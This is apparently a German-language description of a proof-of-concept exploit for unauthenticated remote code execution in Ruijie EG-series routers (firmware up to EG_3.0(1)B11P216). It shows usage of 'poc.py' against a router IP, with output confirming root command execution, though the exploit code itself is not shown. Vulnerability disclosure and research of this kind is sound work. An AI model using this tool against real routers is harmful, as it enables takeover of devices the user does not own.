
Proof-of-Concept-Exploit für nicht authentifizierte Remote-Code-Ausführung in Ruijie EG-Serie Routern (Firmware <=EG_3.0(1)B11P216). Führt beliebige Befehle über manipulierte HTTP-Anfragen aus.
Die Firmware der Ruijie EG Series Router <=EG_3.0(1)B11P216 erlaubt nicht authentifizierten Angreifern, aufgrund fehlerhafter Filterung beliebigen Code remote auszuführen.
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'